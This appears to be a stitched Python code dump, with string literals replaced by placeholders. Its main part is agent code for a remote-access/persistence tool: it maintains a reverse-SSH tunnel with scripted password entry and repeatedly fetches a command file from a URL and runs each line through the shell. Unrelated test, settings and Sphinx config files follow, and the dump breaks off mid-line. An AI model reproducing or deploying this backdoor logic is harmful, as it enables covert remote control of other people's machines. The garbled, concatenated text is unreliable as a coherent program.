INSTALL_TYPE = "<STR_LIT>"
REPOSITORY_LOCATION = "<STR_LIT>"
INSTALL_LOCATION = "<STR_LIT>"
DEBIAN = "<STR_LIT>"
FEDORA = "<STR_LIT>"
AFTER_COMMANDS = "<STR_LIT>"
LAUNCHER = "<STR_LIT>"
# Installer-recipe metadata consumed by a framework module loader;
# same schema as the sibling recipe modules.  Values are extraction
# placeholders -- confirm against the loader.
AUTHOR = "<STR_LIT>"
DESCRIPTION = "<STR_LIT>"
INSTALL_TYPE = "<STR_LIT>"
REPOSITORY_LOCATION = "<STR_LIT>"
INSTALL_LOCATION = "<STR_LIT>"
DEBIAN = "<STR_LIT>"
FEDORA = "<STR_LIT>"
AFTER_COMMANDS = "<STR_LIT>"
LAUNCHER = "<STR_LIT>"
# Installer-recipe metadata consumed by a framework module loader;
# this recipe additionally sets BYPASS_UPDATE.  Values are extraction
# placeholders -- confirm against the loader.
AUTHOR = "<STR_LIT>"
DESCRIPTION = "<STR_LIT>"
INSTALL_TYPE = "<STR_LIT>"
REPOSITORY_LOCATION = "<STR_LIT>"
INSTALL_LOCATION = "<STR_LIT>"
DEBIAN = "<STR_LIT>"
FEDORA = "<STR_LIT>"
BYPASS_UPDATE = "<STR_LIT>"
AFTER_COMMANDS = "<STR_LIT>"
LAUNCHER = "<STR_LIT>"
# Installer-recipe metadata consumed by a framework module loader;
# this recipe additionally lists ARCHLINUX dependencies.  Values are
# extraction placeholders -- confirm against the loader.
AUTHOR = "<STR_LIT>"
DESCRIPTION = "<STR_LIT>"
INSTALL_TYPE = "<STR_LIT>"
REPOSITORY_LOCATION = "<STR_LIT>"
INSTALL_LOCATION = "<STR_LIT>"
DEBIAN = "<STR_LIT>"
FEDORA = "<STR_LIT>"
ARCHLINUX = "<STR_LIT>"
AFTER_COMMANDS = "<STR_LIT>"
LAUNCHER = "<STR_LIT>"
# Agent-side helpers for a remote-access/persistence tool: encrypted
# config handling, reverse-SSH tunnel upkeep and a remote command
# poller.  Python 2 code throughout (print statements, file(), urllib2,
# `except Exception, e`).
import re
import sys
import subprocess
import time
import os
import pexpect
from Crypto.Cipher import AES
import base64
import urllib2
import hashlib
import platform
import urllib2  # NOTE(review): duplicate import; harmless but removable.


def encryptAES(data):
    """Encrypt `data` with a fresh random key, write the key and the
    updated config to disk, then run a cleanup shell command.

    NOTE(review): AES.new(secret) defaults to ECB mode and the key is
    stored base64-encoded on disk next to the config -- this obfuscates
    rather than protects.
    """
    PADDING = '<STR_LIT:{>'
    BLOCK_SIZE = <NUM_LIT:32>
    # Pad the plaintext up to the block size with the PADDING character.
    pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
    a = <NUM_LIT:50> * <NUM_LIT:5>  # NOTE(review): unused.
    EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
    secret = os.urandom(BLOCK_SIZE)
    cipher = AES.new(secret)
    aes = EncodeAES(cipher, data)
    # Rewrite the config file, replacing the matching line with the new
    # ciphertext value.
    fileopen = file("<STR_LIT>", "<STR_LIT:r>")
    config = "<STR_LIT>"
    for line in fileopen:
        line = line.rstrip()
        if "<STR_LIT>" in line:
            line = "<STR_LIT>" + str(aes)
        config = config + line + "<STR_LIT:\n>"
    secret = base64.b64encode(secret)
    filewrite = file("<STR_LIT>", "<STR_LIT:w>")
    filewrite.write(secret)
    filewrite.close()
    filewrite = file("<STR_LIT>", "<STR_LIT:w>")
    filewrite.write(config)
    filewrite.close()
    subprocess.Popen("<STR_LIT>", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()


def decryptAES(data):
    """Decrypt `data` using the on-disk key written by encryptAES;
    return a fallback literal when no key file exists."""
    if os.path.isfile("<STR_LIT>"):
        PADDING = '<STR_LIT:{>'
        BLOCK_SIZE = <NUM_LIT:32>
        pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING  # NOTE(review): unused here.
        a = <NUM_LIT:50> * <NUM_LIT:5>  # NOTE(review): unused.
        DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
        fileopen = file("<STR_LIT>", "<STR_LIT:r>")
        key = fileopen.read()
        secret = base64.b64decode(key)
        cipher = AES.new(secret)
        aes = DecodeAES(cipher, data)
        return str(aes)
    else: return "<STR_LIT>"


def check_debian():
    """Crude distro check based on the presence of a marker file."""
    if os.path.isfile("<STR_LIT>"):
        return "<STR_LIT>"
    else:
        print "<STR_LIT>"
        return "<STR_LIT>"


def check_keepalive():
    """Append SSH keep-alive settings to a config file if missing."""
    if os.path.isfile("<STR_LIT>"):
        fileopen = file("<STR_LIT>", "<STR_LIT:r>")
        data = fileopen.read()
        match = re.search("<STR_LIT>", data)
        if not match:
            print "<STR_LIT>"
            filewrite = file("<STR_LIT>", "<STR_LIT:a>")
            filewrite.write("<STR_LIT>")
            filewrite.write("<STR_LIT>")
            filewrite.close()


def ssh_start():
    """(Re)start the SSH service via shell commands."""
    subprocess.Popen("<STR_LIT>", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
    subprocess.Popen("<STR_LIT>", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()


def update():
    """Wait for connectivity (when a SOCKS proxy is configured), then
    loop forever pulling updates via shell commands.  Never returns."""
    socks = check_config("<STR_LIT>")
    if socks != "<STR_LIT>":
        while <NUM_LIT:1>:
            # Poll until the connectivity probe stops reporting failure.
            proc = subprocess.Popen('<STR_LIT>' % (socks), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
            stdout_value = proc.stdout.read()
            if not "<STR_LIT>" in stdout_value:
                time.sleep(<NUM_LIT:20>)
            else: break
    while <NUM_LIT:1>:
        print "<STR_LIT>"
        subprocess.Popen("<STR_LIT>", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
        print "<STR_LIT>"
        subprocess.Popen("<STR_LIT>", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
        print "<STR_LIT>"
        time.sleep(<NUM_LIT>)


def proxychain():
    """Write a proxychains-style config pointing at the configured
    SOCKS proxy, replacing any existing file."""
    socks = check_config("<STR_LIT>")
    if socks != "<STR_LIT>":
        if os.path.isfile("<STR_LIT>"):
            os.remove("<STR_LIT>")
        filewrite = file("<STR_LIT>", "<STR_LIT:w>")
        filewrite.write("<STR_LIT>" % (socks))
        filewrite.close()


def tap_update():
    """Self-update: clone/update the tool from its repository when the
    auto-update flag is enabled in the config."""
    auto_update = check_config("<STR_LIT>")
    if auto_update == "<STR_LIT>":
        print "<STR_LIT>"
        updates = check_config("<STR_LIT>")
        if not os.path.isdir("<STR_LIT>"):
            subprocess.Popen("<STR_LIT>", shell=True).wait()
        os.chdir("<STR_LIT>")
        # NOTE(review): `updates` comes straight from the config file and
        # is run through the shell -- config compromise means command
        # execution.
        subprocess.Popen(updates, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
    else:
        print "<STR_LIT>"


def check_config_path():
    """Return the last existing candidate path for the config file."""
    path = "<STR_LIT>"
    if os.path.isfile("<STR_LIT>"):
        path = "<STR_LIT>"
    if os.path.isfile("<STR_LIT>"):
        path = "<STR_LIT>"
    return path


def check_config(param):
    """Return the value of `param` ("KEY=value" style) from the config
    file, skipping comment lines; a default literal is returned when no
    line matches.

    NOTE(review): `param` is used as a regex via re.search, and the
    `counter = 1` after the return is unreachable -- the not-found
    branch relies on counter remaining 0.
    """
    path = check_config_path()
    fileopen = file(path, "<STR_LIT:r>")
    counter = <NUM_LIT:0>
    for line in fileopen:
        if not line.startswith("<STR_LIT:#>"):
            match = re.search(param, line)
            if match:
                line = line.rstrip()
                line = line.replace('<STR_LIT:">', "<STR_LIT>")
                line = line.split("<STR_LIT:=>", <NUM_LIT:1>)
                return line[<NUM_LIT:1>]
                counter = <NUM_LIT:1>
    if counter == <NUM_LIT:0>:
        return "<STR_LIT>"


def ssh_run():
    """Establish and babysit the reverse-SSH tunnel: read credentials
    from the config, free the tunnel port, spawn the tunnel, then poll
    it forever and respawn on failure.  Never returns."""
    subprocess.Popen("<STR_LIT>", shell=True).wait()
    username = check_config("<STR_LIT>")
    password = check_config("<STR_LIT>")
    password = decryptAES(password).rstrip()
    port = check_config("<STR_LIT>")
    host = check_config("<STR_LIT>")
    localport = check_config("<STR_LIT>")
    interval = check_config("<STR_LIT>")
    interval = int(interval)
    proxychain()
    ssh_gen = check_config("<STR_LIT>")
    ssh_commands = "<STR_LIT>"
    if ssh_gen.lower() == "<STR_LIT>":
        ssh_commands = "<STR_LIT>"
    # First interactive step: answer the password prompt if it appears.
    try:
        child = pexpect.spawn("<STR_LIT>")
        i = child.expect(['<STR_LIT>'])
        if i == <NUM_LIT:0>:
            child.sendline(password)
        child.close()
    except: pass
    print "<STR_LIT>"
    # Kill any stale process already bound to the tunnel port.
    proc = subprocess.Popen("<STR_LIT>" % (port), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    stdout_value = proc.communicate()[<NUM_LIT:0>]
    stdout_value = stdout_value.split("<STR_LIT:U+0020>")
    for line in stdout_value:
        if "<STR_LIT>" in line:
            print "<STR_LIT>"
            line = line.replace("<STR_LIT>", "<STR_LIT>")
            subprocess.Popen("<STR_LIT>" + line, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    print "<STR_LIT>"
    print "<STR_LIT>" + host + "<STR_LIT>" + port
    subprocess.Popen("<STR_LIT>", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
    # Spawn the reverse tunnel and answer password / host-key prompts.
    child = pexpect.spawn("<STR_LIT>" % (localport, username, host, port, ssh_commands))
    i = child.expect(['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'])
    if i == <NUM_LIT:0>:
        child.sendline(password)
    if i == <NUM_LIT:1>:
        child.sendline("<STR_LIT:yes>")
        if password != "<STR_LIT>":
            child.expect(['<STR_LIT>'])
            child.sendline(password)
    if i == <NUM_LIT:2>:
        print "<STR_LIT>"
    time.sleep(<NUM_LIT>)
    while <NUM_LIT:1>:
        print "<STR_LIT>"
        time.sleep(<NUM_LIT:1>)
        try:
            # Probe the remote end to confirm the tunnel port is alive.
            portcheck = pexpect.spawn('<STR_LIT>' % (port, ssh_commands, username, host, localport))
            i = portcheck.expect(['<STR_LIT>', '<STR_LIT>', localport])
            if i == <NUM_LIT:0>:
                portcheck.sendline(password)
            if i == <NUM_LIT:1>:
                portcheck.sendline("<STR_LIT:yes>")
                if password != "<STR_LIT>":
                    portcheck.expect("<STR_LIT:password>")
                    portcheck.sendline(password)
            if i == <NUM_LIT:2>:
                portcheck.sendline("<STR_LIT>")
            i = portcheck.expect([localport, "<STR_LIT>"])
            if i == <NUM_LIT:0>:
                portcheck.sendline("<STR_LIT>")
            if i == <NUM_LIT:1>:
                pass
        except:
            # Probe failed: kill the old tunnel and respawn it.
            print "<STR_LIT>"
            subprocess.Popen("<STR_LIT>", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
            child = pexpect.spawn("<STR_LIT>" % (localport, username, host, port, ssh_commands))
            i = child.expect(['<STR_LIT>', '<STR_LIT>', localport])
            if i == <NUM_LIT:0>:
                child.sendline(password)
            if i == <NUM_LIT:1>:
                child.sendline("<STR_LIT:yes>")
                if password != "<STR_LIT>":
                    child.expect("<STR_LIT>")
                    child.sendline(password)
            if i == <NUM_LIT:2>:
                child.sendline("<STR_LIT>")
        print "<STR_LIT>"
        # Optionally keep a SOCKS-proxied side tunnel alive as well.
        socks = check_config("<STR_LIT>").rstrip()
        if socks != "<STR_LIT>":
            proc = subprocess.Popen('<STR_LIT>' % (socks), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
            stdout_value = proc.stdout.read()
            if not "<STR_LIT>" in stdout_value:
                print "<STR_LIT>"
                try:
                    child1 = pexpect.spawn("<STR_LIT>" % (socks, username, host, port, ssh_commands))
                    i = child1.expect(['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'])
                    if i == <NUM_LIT:0>:
                        child1.sendline(password)
                    if i == <NUM_LIT:1>:
                        child1.sendline("<STR_LIT:yes>")
                        if password != "<STR_LIT>":
                            child1.expect("<STR_LIT>")
                            child1.sendline(password)
                    if i == <NUM_LIT:2>: pass
                except Exception, e:
                    print e
                    print("<STR_LIT>")
                    pass
        time.sleep(interval)


def execute_command():
    """Poll a remote URL for a command file; when its contents change,
    persist it and execute each non-empty line via the shell.  Never
    returns.

    NOTE(review): executing shell lines fetched over urllib2 is remote
    code execution by design; also the `or "<STR_LIT>"` below is always
    truthy, making that guard a no-op.
    """
    commands = <NUM_LIT:0>
    while <NUM_LIT:1>:
        try:
            print "<STR_LIT>"
            url = check_config("<STR_LIT>")
            if url != "<STR_LIT>":
                try:
                    req = urllib2.Request(url)
                    html = urllib2.urlopen(req).read()
                    # NOTE(review): condition is always true (see docstring).
                    if "<STR_LIT>" in html or "<STR_LIT>":
                        commands = <NUM_LIT:0>
                        if os.path.isfile("<STR_LIT>"):
                            # Hash old vs new payload to detect changes.
                            filewrite = file("<STR_LIT>", "<STR_LIT:w>")
                            filewrite.write(html)
                            filewrite.close()
                            fileopen1 = file("<STR_LIT>", "<STR_LIT:r>")
                            fileopen2 = file("<STR_LIT>", "<STR_LIT:r>")
                            data1 = fileopen1.read()
                            data2 = fileopen2.read()
                            hash = hashlib.sha512()
                            hash.update(data1)
                            hash1 = hash.hexdigest()
                            hash = hashlib.sha512()
                            hash.update(data2)
                            hash2 = hash.hexdigest()
                            if hash1 != hash2: commands = <NUM_LIT:1>
                        if not os.path.isfile("<STR_LIT>") or commands == <NUM_LIT:1>:
                            print "<STR_LIT>"
                            filewrite = file("<STR_LIT>", "<STR_LIT:w>")
                            filewrite.write(html)
                            filewrite.close()
                            time.sleep(<NUM_LIT:1>)
                            fileopen = file("<STR_LIT>", "<STR_LIT:r>")
                            for line in fileopen:
                                line = line.rstrip()
                                if line != "<STR_LIT>":
                                    if line != "<STR_LIT>":
                                        subprocess.Popen(line, shell=True).wait()
                except: pass
                if commands == <NUM_LIT:1>:
                    print "<STR_LIT>"
                else:
                    print "<STR_LIT>"
                time.sleep(<NUM_LIT>)
            if url == "<STR_LIT>":
                time.sleep(<NUM_LIT>)
        except: pass


def ssh_keygen(passphrase):
    """Regenerate the SSH keypair with the given passphrase, answering
    ssh-keygen's interactive prompts via pexpect."""
    print "<STR_LIT>"
    if os.path.isfile("<STR_LIT>"):
        print "<STR_LIT>"
        os.remove("<STR_LIT>")
        os.remove("<STR_LIT>")
    print "<STR_LIT>"
    passphrase = passphrase.rstrip()
    child = pexpect.spawn("<STR_LIT>")
    child.expect("<STR_LIT>")
    child.sendline("<STR_LIT>")
    print "<STR_LIT>"
    child.sendline(passphrase)
    child.expect("<STR_LIT>")
    child.sendline(passphrase)
    print "<STR_LIT>"
    child.sendline("<STR_LIT>")
    print "<STR_LIT>"


def download_file(url):
    """Download `url` into the current directory in fixed-size blocks,
    printing a progress status line as data arrives."""
    file_name = url.split('<STR_LIT:/>')[-<NUM_LIT:1>]
    u = urllib2.urlopen(url)
    f = open(file_name, '<STR_LIT:wb>')
    meta = u.info()
    file_size = int(meta.getheaders("<STR_LIT>")[<NUM_LIT:0>])
    print "<STR_LIT>" % (file_name, file_size)
    file_size_dl = <NUM_LIT:0>
    block_sz = <NUM_LIT>
    while True:
        buffer = u.read(block_sz)
        if not buffer:
            break
        file_size_dl += len(buffer)
        f.write(buffer)
        status = r"<STR_LIT>" % (file_size_dl, file_size_dl * <NUM_LIT> / file_size)
        # Backspace over the previous status line for in-place progress.
        status = status + chr(<NUM_LIT:8>) * (len(status) + <NUM_LIT:1>)
        print status,
    f.close()


def check_os():
    """Return an architecture label based on interpreter bitness."""
    osversion = platform.architecture()[<NUM_LIT:0>]
    if osversion == "<STR_LIT>":
        return "<STR_LIT>"
    else:
        return "<STR_LIT>"


def motd(client):
    """Append a client-specific banner line to the message-of-the-day
    style file, preserving its existing content."""
    print("<STR_LIT>")
    data = file("<STR_LIT>", "<STR_LIT:rb>").read()
    filewrite = file("<STR_LIT>", "<STR_LIT:w>")
    filewrite.write(data)
    filewrite.write("<STR_LIT>" % (client))
    filewrite.close()
    print("<STR_LIT>")


def log_everything():
    """Enable extra logging based on a config flag.

    NOTE(review): source is truncated mid-function below.
    """
    log = check_config("<STR_LIT>")
    if log == None:
        if os.path.isfile("<STR_LIT>"):
            filewrite = file("<STR_LIT>", "<STR_LIT:a>")
            filewrite.write("<STR_LIT>")
            filewrite.close()
        else:
            print "<STR_LIT>"
    log = check_config("<STR_LIT>")
    if log.lower() == "<STR_LIT:yes>":
        data = file("<STR_LIT>", "<STR_LIT:r>").read()
        if """<STR_LIT>""" in data:
            print "<STR_LIT>"
        else:
            print "<STR_LIT>"
            filewrite = file("<STR_LIT>", "<STR_LIT:a>")
            filewrite .
write ( """<STR_LIT>""" ) <EOL> filewrite . close ( ) <EOL> print "<STR_LIT>" <EOL> if log . lower ( ) == "<STR_LIT>" : <EOL> fileopen = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> data = fileopen . read ( ) <EOL> if """<STR_LIT>""" in data : <EOL> print "<STR_LIT>" <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> data = "<STR_LIT>" <EOL> for line in fileopen : <EOL> line = line . rstrip ( ) <EOL> if not ( """<STR_LIT>""" ) in line : <EOL> data = data + line <EOL> filewrite . write ( data ) <EOL> filewrite . close ( ) <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) <EOL> print "<STR_LIT>" <EOL> else : <EOL> print "<STR_LIT>" <EOL> def update_startup ( ) : <EOL> fileopen = file ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> config = fileopen . read ( ) <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> filewrite . write ( config ) <EOL> filewrite . close ( ) <EOL> print "<STR_LIT>" <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) <EOL> def ssh_vpn ( ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> print "<STR_LIT>" <EOL> data = file ( "<STR_LIT>" , "<STR_LIT:r>" ) . read ( ) <EOL> if not "<STR_LIT>" in data : <EOL> print "<STR_LIT>" <EOL> filewrite = file ( "<STR_LIT>" , "<STR_LIT:a>" ) <EOL> filewrite . write ( "<STR_LIT>" ) <EOL> filewrite . close ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> subprocess . Popen ( "<STR_LIT>" , stdout = subprocess . PIPE , stderr = subprocess . PIPE , shell = True ) <EOL> print "<STR_LIT>" <EOL> def set_background ( ) : <EOL> subprocess . Popen ( "<STR_LIT>" , shell = True ) . wait ( ) </s>
<s> import mock <EOL> from twisted . trial . unittest import TestCase <EOL> from tryfer import log <EOL> from twisted . python import log as twisted_log <EOL> class LogTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . mock_log_patcher = mock . patch ( '<STR_LIT>' ) <EOL> self . mock_log = self . mock_log_patcher . start ( ) <EOL> def tearDown ( self ) : <EOL> log . set_debugging ( False ) <EOL> self . mock_log_patcher . stop ( ) <EOL> def test_default_debug_off ( self ) : <EOL> log . debug ( '<STR_LIT:test>' ) <EOL> self . assertEqual ( self . mock_log . msg . call_count , <NUM_LIT:0> ) <EOL> def test_set_debugging_default ( self ) : <EOL> log . set_debugging ( ) <EOL> log . debug ( '<STR_LIT:test>' ) <EOL> self . mock_log . msg . assert_called_once_with ( '<STR_LIT:test>' , logLevel = '<STR_LIT>' ) <EOL> def test_set_debugging_explicit ( self ) : <EOL> log . set_debugging ( True ) <EOL> log . debug ( '<STR_LIT:test>' ) <EOL> self . mock_log . msg . assert_called_once_with ( '<STR_LIT:test>' , logLevel = '<STR_LIT>' ) <EOL> def test_set_debugging_off ( self ) : <EOL> log . set_debugging ( True ) <EOL> log . debug ( '<STR_LIT:test>' ) <EOL> log . set_debugging ( False ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . mock_log . msg . assert_called_once_with ( '<STR_LIT:test>' , logLevel = '<STR_LIT>' ) <EOL> def test_msg ( self ) : <EOL> self . assertEqual ( log . msg , twisted_log . msg ) <EOL> def test_err ( self ) : <EOL> self . assertEqual ( log . err , twisted_log . err ) </s>
<s> """<STR_LIT>""" <EOL> SPIDERS = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] </s>
<s> import sys <EOL> import os <EOL> extensions = [ ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from django . conf import settings <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> FACEBOOK_APP_ID = getattr ( settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_APP_SECRET = getattr ( settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_DEFAULT_SCOPE = getattr ( settings , '<STR_LIT>' , [ <EOL> '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> FACEBOOK_STORE_LIKES = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_STORE_FRIENDS = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_CELERY_STORE = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_CELERY_TOKEN_EXTEND = getattr ( <EOL> settings , '<STR_LIT>' , False ) <EOL> default_registration_backend = '<STR_LIT>' <EOL> FACEBOOK_REGISTRATION_BACKEND = getattr ( <EOL> settings , '<STR_LIT>' , default_registration_backend ) <EOL> FACEBOOK_CANVAS_PAGE = getattr ( settings , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> FACEBOOK_STORE_LOCAL_IMAGE = getattr ( <EOL> settings , '<STR_LIT>' , True ) <EOL> FACEBOOK_TRACK_RAW_DATA = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_DEBUG_REDIRECTS = getattr ( settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_READ_ONLY = getattr ( settings , '<STR_LIT>' , False ) <EOL> default_registration_template = [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> FACEBOOK_REGISTRATION_TEMPLATE = getattr ( settings , <EOL> '<STR_LIT>' , default_registration_template ) <EOL> FACEBOOK_REGISTRATION_FORM = getattr ( settings , <EOL> '<STR_LIT>' , None ) <EOL> FACEBOOK_LOGIN_DEFAULT_REDIRECT = getattr ( <EOL> settings , '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> FACEBOOK_FORCE_PROFILE_UPDATE_ON_LOGIN = getattr ( <EOL> settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_OG_SHARE_RETRIES = getattr ( settings , '<STR_LIT>' , <NUM_LIT:6> ) <EOL> FACEBOOK_OG_SHARE_RETRY_DAYS = getattr ( <EOL> settings , '<STR_LIT>' , <NUM_LIT:7> ) <EOL> FACEBOOK_OG_SHARE_DB_TABLE = getattr ( <EOL> settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_FORCE_PROFILE_UPDATE_ON_LOGIN 
= getattr ( <EOL> settings , '<STR_LIT>' , False ) <EOL> FACEBOOK_PROFILE_IMAGE_PATH = getattr ( <EOL> settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_CLASS_MAPPING = getattr ( <EOL> settings , '<STR_LIT>' , None ) <EOL> FACEBOOK_SKIP_VALIDATE = getattr ( <EOL> settings , '<STR_LIT>' , False ) </s>
<s> """<STR_LIT>""" <EOL> class InstallationError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class UninstallationError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class DistributionNotFound ( InstallationError ) : <EOL> """<STR_LIT>""" <EOL> class BadCommand ( Exception ) : <EOL> """<STR_LIT>""" </s>
<s> import datetime <EOL> import logging <EOL> import unittest <EOL> from django . utils . six import StringIO <EOL> import mock <EOL> from open_facebook . api import * <EOL> from open_facebook . exceptions import OpenGraphException <EOL> from open_facebook . utils import json <EOL> from pprint import pprint <EOL> try : <EOL> from urllib2 import HTTPError <EOL> except ImportError : <EOL> from urllib . error import HTTPError <EOL> logger = logging . getLogger ( ) <EOL> TEST_USER_FORCE_CREATE = False <EOL> TEST_USER_DICT = { <EOL> '<STR_LIT>' : dict ( name = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dict ( name = '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dict ( name = '<STR_LIT>' , permissions = [ '<STR_LIT>' ] ) <EOL> } <EOL> TEST_USER_NAMES = [ v [ '<STR_LIT:name>' ] for k , v in TEST_USER_DICT . items ( ) ] <EOL> TEST_USER_OBJECTS = None <EOL> def setup_users ( ) : <EOL> '''<STR_LIT>''' <EOL> from django . core . cache import cache <EOL> global TEST_USER_OBJECTS <EOL> if TEST_USER_OBJECTS is None : <EOL> key = '<STR_LIT>' <EOL> user_objects = cache . get ( key ) <EOL> if not user_objects or TEST_USER_FORCE_CREATE : <EOL> logger . info ( '<STR_LIT>' ) <EOL> user_objects = { } <EOL> app_token = FacebookAuthorization . get_app_access_token ( ) <EOL> for user_slug , user_dict in TEST_USER_DICT . items ( ) : <EOL> test_user = FacebookAuthorization . get_or_create_test_user ( <EOL> app_token , name = user_dict [ <EOL> '<STR_LIT:name>' ] , force_create = TEST_USER_FORCE_CREATE , <EOL> permissions = user_dict . get ( '<STR_LIT>' ) <EOL> ) <EOL> user_objects [ user_slug ] = test_user <EOL> cache . set ( key , user_objects , <NUM_LIT> * <NUM_LIT> ) <EOL> TEST_USER_OBJECTS = user_objects <EOL> return TEST_USER_OBJECTS <EOL> class OpenFacebookTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> setup_users ( ) <EOL> for user_slug , user_object in TEST_USER_OBJECTS . items ( ) : <EOL> setattr ( self , user_slug , user_object ) <EOL> import sys <EOL> self . prints = sys . 
stdout = StringIO ( ) <EOL> def tearDown ( self ) : <EOL> self . prints . seek ( <NUM_LIT:0> ) <EOL> content = self . prints . read ( ) <EOL> if content : <EOL> raise ValueError ( '<STR_LIT>' % content ) <EOL> class TestErrorMapping ( OpenFacebookTest ) : <EOL> def test_syntax_error ( self ) : <EOL> error_response = '''<STR_LIT>''' <EOL> return <EOL> def test_oauth_errors ( self ) : <EOL> expires_response = '''<STR_LIT>''' <EOL> changed_password_response = '''<STR_LIT>''' <EOL> deauthorized_response = '''<STR_LIT>''' <EOL> loggedout_response = '''<STR_LIT>''' <EOL> responses = [ expires_response , changed_password_response , <EOL> deauthorized_response , loggedout_response ] <EOL> response_objects = [ ] <EOL> for response_string in responses : <EOL> response = json . loads ( response_string ) <EOL> response_objects . append ( response ) <EOL> from open_facebook import exceptions as open_facebook_exceptions <EOL> for response in response_objects : <EOL> oauth = False <EOL> try : <EOL> FacebookConnection . raise_error ( response [ '<STR_LIT:error>' ] [ '<STR_LIT:type>' ] , <EOL> response [ '<STR_LIT:error>' ] [ '<STR_LIT:message>' ] ) <EOL> except open_facebook_exceptions . OAuthException as e : <EOL> oauth = True <EOL> assert oauth , '<STR_LIT>' % response <EOL> def test_non_oauth_errors ( self ) : <EOL> object_open_graph_error = '''<STR_LIT>''' <EOL> response = json . loads ( object_open_graph_error ) <EOL> def test ( ) : <EOL> FacebookConnection . raise_error ( <EOL> response [ '<STR_LIT:error>' ] [ '<STR_LIT:type>' ] , <EOL> response [ '<STR_LIT:error>' ] [ '<STR_LIT:message>' ] , <EOL> response [ '<STR_LIT:error>' ] . get ( '<STR_LIT:code>' ) <EOL> ) <EOL> self . assertRaises ( OpenGraphException , test ) <EOL> class Test500Detection ( OpenFacebookTest ) : <EOL> def test_application_error ( self ) : <EOL> '''<STR_LIT>''' <EOL> graph = self . guy . graph ( ) <EOL> with mock . patch ( '<STR_LIT>' ) as patched : <EOL> opener = mock . 
